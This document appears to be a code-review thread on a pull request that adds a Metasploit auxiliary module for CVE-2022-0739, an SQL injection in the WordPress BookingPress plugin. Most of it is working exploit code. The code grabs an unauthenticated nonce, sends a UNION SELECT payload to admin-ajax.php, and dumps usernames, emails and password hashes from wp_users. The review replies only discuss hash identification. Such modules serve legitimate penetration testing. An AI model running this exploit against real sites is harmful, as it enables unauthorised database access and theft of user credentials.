modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb

```diff
@@ -0,0 +1,124 @@
+        },
+        'Author' => [
+          'cyllective', # discovery
+          'jheysel-r7' # module
+        ],
+        'References' => [
+          [ 'URL', 'https://github.com/destr4ct/CVE-2022-0739'],
+          [ 'WPVDB', '388cd42d-b61a-42a4-8604-99b812db2357'],
+          [ 'CVE', '2022-0739']
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2022-02-28',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The webpage that bookingPress is running on', '/bookingpress/' ])
+    ])
+  end
+
+  def check
+    @nonce = get_user_nonce
+    return Exploit::CheckCode::Unknown if @nonce == 'Unable to get wp-nonce for an unauthenticated user'
+
+    @sqli = get_sqli_object
+
+    return Exploit::CheckCode::Vulnerable if @sqli.test_vulnerable
+
+    Exploit::CheckCode::Safe
+  end
+
+  def generate_vars_post(sqli)
+    {
+      'action' => 'bookingpress_front_get_category_services', # vulnerable action,
+      '_wpnonce' => @nonce,
+      'category_id' => 1,
+      'total_service' => "#{rand(100..10000)}#{sqli}"
+    }
+  end
+
+  def get_sqli_object
+    create_sqli(dbms: MySQLi::Common, opts: { hex_encode_strings: true }) do |payload|
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri('/wp-admin/admin-ajax.php'),
+        'vars_post' =>
+            generate_vars_post(") UNION ALL SELECT (#{payload}),456,789,12,34,56,78,90,77 from wp_users-- -")
+      })
+      res.get_json_document[0]['bookingpress_service_id']
+    end
+  end
+
+  def get_user_nonce
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'])
+    })
+
+    return 'Unable to get wp-nonce for an unauthenticated user' unless res&.body&.match("_wpnonce:'(\\w+)' };")
+
+    ::Regexp.last_match(1)
+  end
+
+  def run
+    @nonce ||= get_user_nonce
+    @sqli ||= get_sqli_object
+    fail_with(Failure::UnexpectedReply, 'Unable to get wp-nonce for an unauthenticated user') if @nonce == 'Unable to get wp-nonce for an unauthenticated user'
+
+    creds_table = Rex::Text::Table.new(
+      'Header' => 'Wordpress User Credentials',
+      'Indent' => 1,
+      'Columns' => ['Username', 'Email', 'Hash']
+    )
+
+    print_status('Extracting credential information')
+    users = @sqli.dump_table_fields('wp_users', %w[user_login user_email user_pass])
+
+    users.each do |(username, email, hash)|
+      creds_table << [username, email, hash]
+      create_credential({
+        workspace_id: myworkspace_id,
+        origin_type: :service,
+        module_fullname: fullname,
+        username: username,
+        private_type: :nonreplayable_hash,
+        jtr_format: Metasploit::Framework::Hashes.identify_hash(hash),
```

Comment:
Correct me if I am wrong but did one of our users report an error when using this module on this line? Was that fixed?

Reply:
Hmm in my tests I was unable to replicate this when not connected to a database:

```
>> Metasploit::Framework::Hashes.identify_hash("a")
=> ""
>> exit
msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > db_status
[*] postgresql selected, no connection                             
msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) >           
```

If @RapidWolf95 is able to provide reproduction steps for this issue that work on the latest code base I'll be happy to look into this further but as I'm unable to replicate it at this time I'm happy to proceed for now.

Reply:
This also seems to work when connected to the database:

```
irb: warn: can't alias jobs from irb_jobs.
>> Metasploit::Framework::Hashes.identify_hash("a")
=> ""
>> exit
msf6 > msfdb_status
[-] Unknown command: msfdb_status
msf6 > db_status             
[*] Connected to msf. Connection type: postgresql.
msf6 >        
```